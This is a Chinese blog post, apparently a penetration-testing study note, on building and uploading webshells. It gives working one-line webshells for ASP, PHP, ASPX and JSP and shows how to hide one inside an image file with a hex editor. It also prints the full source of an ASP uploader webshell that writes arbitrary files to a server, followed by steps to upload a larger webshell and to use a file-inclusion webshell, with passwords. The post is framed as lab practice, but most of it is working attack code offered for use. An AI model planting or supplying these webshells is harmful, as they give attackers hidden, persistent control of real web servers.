欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

20、渗透测试笔记_webshell制作_20191114

程序员文章站 2022-03-10 21:24:21
...

1、webshell种类

  • 一句话木马
  • 小马
  • 大马
  • 打包马
  • 脱裤马
  • 等等

2、一句话木马

2.1、介绍

  • 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

  • <%excute request("value")%>
    

2.2、工作原理

  • 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:

  • <%excute request("value")%>
    
  • 其中value是值,所以你可以更改自己的值,前面的request就是获取这个值

  • <%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的使用)

  • 当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了)

  • 这就被称为一句话木马,他是基于B/S架构的

2.3、常见写法

  • asp一句话木马:

    <%eval request("c")%>
    
  • php一句话木马:

    <?php @eval($_POST[value]);?>
    
  • aspx一句话木马:

    <%@ Page Language="Jscript"%>
    <%eval(Request.Item["value"])%>
    
  • jsp一句话木马:

    <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> 
    

3、小马&大马

3.1、介绍

  • 小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能
  • 大马体积比较大,一般50k以上,功能也多,一半都包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些已具备自带提权功能和压缩,解压缩网站程序的功能。这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序

3.2、使用

  • 小马的使用

    主要用来上传大马

  • 大马的使用

    提权、打包、脱裤、增删文件等

4、一句话木马的制作和上传

  1. 去百度找一张图片(尽量看起来像服务器网站后台的图片)

  2. 打开C32Asm工具
    20、渗透测试笔记_webshell制作_20191114
    3.将图片拖进工具中,选择以16进制打开
    20、渗透测试笔记_webshell制作_20191114

  3. 拉到最下方,将一句话木马复制进图片中(可以多复制几种asp、php)
    20、渗透测试笔记_webshell制作_20191114

  4. 制作完成后即可开始使用
    20、渗透测试笔记_webshell制作_20191114

  5. 启动靶机的phpstudy,将制作好的木马放入网站根目录下,并将其名字改为a.php
    20、渗透测试笔记_webshell制作_20191114

  6. 右键文件属性–>点击安全–>点击添加–>输入个对象名称–>确定
    20、渗透测试笔记_webshell制作_20191114

  7. 点击everyone,将权限全部勾选,点击确定
    20、渗透测试笔记_webshell制作_20191114

  8. 使用攻击机访问此文件路径
    20、渗透测试笔记_webshell制作_20191114

  9. 打开菜刀进行连接,密码为1 (如果菜刀连接不成功可以换一张图片重新制作,大部分是选取的图片的问题)
    20、渗透测试笔记_webshell制作_20191114
    20、渗透测试笔记_webshell制作_20191114

5、小马的使用–上传大马

  1. 将小马复制进入靶机web目录下,小马内容如下:

    <%
    on error resume next
    %>
    <%
      if request("pass")="g" then  '在这修改密码
      session("pw")="go"
      end if
    %>
    <%if session("pw")<>"go" then %>
    <%="<center><br><form action='' method='post'>"%>
    <%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='用力插进去'></center>"%>
    <%else%>
    <%
    set fso=server.createobject("scripting.filesystemobject")
    path=request("path")
    if path<>"" then
    data=request("da")
    set da=fso.createtextfile(path,true)
    da.write data
    if err=0 then
    %>
    <%="yes"%>
    <%else%>
    <%="no"%>
    <%
    end if
    err.clear
    end if
    da.close
    %>
    <%set da=nothing%>
    <%set fos=nothing%>
    <%="<form action='' method=post>"%>
    <%="<input type=text name=path>"%>
    <%="<br>"%>
    <%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%>
    <%="<br>"%>
    <%="操作系统为:"&Request.ServerVariables("OS")%>
    <%="<br>"%>
    <%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%>
    <%="<br>"%>
    <%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%>
    <%="<br>"%>
    <%=""%>
    <%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
    <%="<br>"%>
    <%="<input type=submit value=save>"%>
    <%="</form>"%>
    <%end if%>
    
  2. 将x.asp复制到靶机
    20、渗透测试笔记_webshell制作_20191114

  3. 右键文件属性–>点击安全–>点击添加–>输入个对象名称–>确定
    20、渗透测试笔记_webshell制作_20191114

  4. 点击everyone,将权限全部勾选,点击确定
    20、渗透测试笔记_webshell制作_20191114

  5. 访问目标地址,密码为g进入
    20、渗透测试笔记_webshell制作_20191114
    20、渗透测试笔记_webshell制作_20191114

  6. 进入界面后,第一个输入框输入路径,并且给大马起个名字:C:\web2.asp\xx.asp,第二个输入框输入大马(大马可以下方评论留言)
    点击save上传成功界面为
    20、渗透测试笔记_webshell制作_20191114

  7. 访问新的上传的大马
    20、渗透测试笔记_webshell制作_20191114

  8. 输入密码为cc2789,进入以下界面为成功
    20、渗透测试笔记_webshell制作_20191114

6、文件包含马

  1. 木马文件内容为,引号内容为,要进行包含的木马
    20、渗透测试笔记_webshell制作_20191114
  2. 访问文件包含马路径
    20、渗透测试笔记_webshell制作_20191114
  3. 输入密码为cc2789,进入以下界面为成功
    20、渗透测试笔记_webshell制作_20191114